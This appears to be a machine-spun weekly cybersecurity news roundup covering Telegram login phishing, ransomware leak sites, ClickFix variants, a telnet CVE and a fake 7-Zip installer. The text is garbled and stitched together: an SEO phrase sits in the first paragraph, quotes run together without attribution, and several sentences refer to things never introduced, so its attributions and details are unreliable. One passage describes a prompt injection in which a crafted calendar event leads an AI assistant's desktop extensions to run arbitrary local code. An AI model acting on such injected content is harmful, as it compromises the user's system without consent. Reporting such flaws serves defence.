One recurring theme in this week's threat activity is that attackers are relying more on what has already proven effective This article explores authentication apis telegram. . Many operations are based on the covert misuse of well-known tools, well-known workflows, and hidden exposures that are right in front of you, rather than on slick new exploits.

The way access is obtained as opposed to how it is utilized is another change. While post-compromise activity is growing more purposeful, organized, and persistent, initial entry points are becoming easier. Staying embedded long enough to extract value is more important than causing disruption. In one variation, victims are directed to use the Telegram mobile application to scan a QR code on fraudulent websites, which starts a genuine Telegram login attempt linked to attacker-controlled API credentials.

After that, Telegram prompts the victim's current session for in-app authorization. As an alternative, users can input their phone number, country code, and verification code (if enabled) on a phony website, which will send the information to Telegram's official authentication APIs. As before, Telegram sends out an in-app authorization request after verification is successful.

"This campaign uses attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure, in contrast to traditional phishing attacks that only use token replay or credential harvesting," CYFIRMA stated.Claude Desktop Extensions operate unsandboxed with full system privileges, in contrast to conventional browser extensions, according to the browser security firm.

Claude can thus independently link low-risk connectors (like Google Calendar) to high-risk local executors without the user's knowledge or approval. Even a harmless prompt ('take care of it') combined with a maliciously crafted calendar event can be used by a bad actor to initiate arbitrary local code execution that compromises the system as a whole." Anthropic has decided not to address the problem at this time.

Last month, Miggo Security revealed a similar Google Gemini prompt injection vulnerability. Since its initial appearance in September 2025, Coinbase Cartel, a fledgling ransomware group, has reported over 60 victims.

On February 8, 2026, the data leak website went down, but it came back up the following day with a list of over 15 very large multinational corporations. According to security researcher Jason Baker, "0APT is probably acting in this dishonest way to encourage extortion of ignorant victims, re-extortion of past victims from other groups, defrauding of potential affiliates, or to generate interest in a new RaaS group." The Windows and Linux ransomware samples have been discovered to be fully functional, despite indications that the group may be lying about the number of victims, according to Halcyon.

It's important to note that ransomware organizations such as RansomedVC have deceived victims by listing fake attacks on their data leak websites.

When viewed in that context, 0APT's inflated claims are probably an effort to become more visible and popular among its peers. According to Cofense, "the way these emails operate is that the threat actor registers for an account on a trustworthy website and enters random text into a field that will then be included in outgoing emails." "The threat actor would then have to receive a genuine email that just so happens to contain the malicious text that the threat actor had produced.

The threat actor can then reroute the email to the targeted victims after receiving it." Malicious payloads consistent with a known malware known as SystemBC have been delivered via the CrashFix attack variant of the ClickFix attack.

The attack is notable because it did not use a malicious browser extension, in contrast to the CrashFix-style social engineering flow that Microsoft and Huntress documented. Binary Defense stated, "Instead, the victim was persuaded to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix." "Operators should change default passwords right away and set up rules requiring integrators or OT suppliers to enforce password changes going forward."

In a related move, Jonathan Ellison, the National Cyber Security Centre's (NCSC) director for national resilience, has called on the nation's critical infrastructure operators to take immediate action and prepare incident response plans or playbooks to handle such threats.

Ellison stated that "strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does," even though attacks are still possible. Six days prior to the public release of a security advisory for CVE-2026-24061 on January 20, threat intelligence firm GreyNoise reported a sharp drop in global Telnet traffic on January 14, 2026. A serious flaw in the GNU InetUtils telnet daemon, known as CVE-2026-24061, could lead to an authentication bypass.

The hourly volume of Telnet sessions decreased by 65% on January 14 at 21:00 UTC, and then by 83% in two hours, according to data collected by GreyNoise. Google patched them in September 2025 and they were collectively tracked as CVE-2025-12743, also known as LookOut (CVSS score: 6.5).

Users of self-hosted Looker instances are encouraged to update to the most recent supported version, even though the fixes have been implemented for cloud instances. A proxy component that enrolls the compromised host in a residential proxy node is being dropped by a phony installer for the 7-Zip file archiver tool that was downloaded from 7zip[. ]com (the genuine domain is 7-zip[.]org).

This enables third parties to hide their own origins while rerouting traffic through the victim's IP address. A now-revoked certificate that was initially granted to Jozeal Network Technology Co., Limited is used to digitally sign the installer.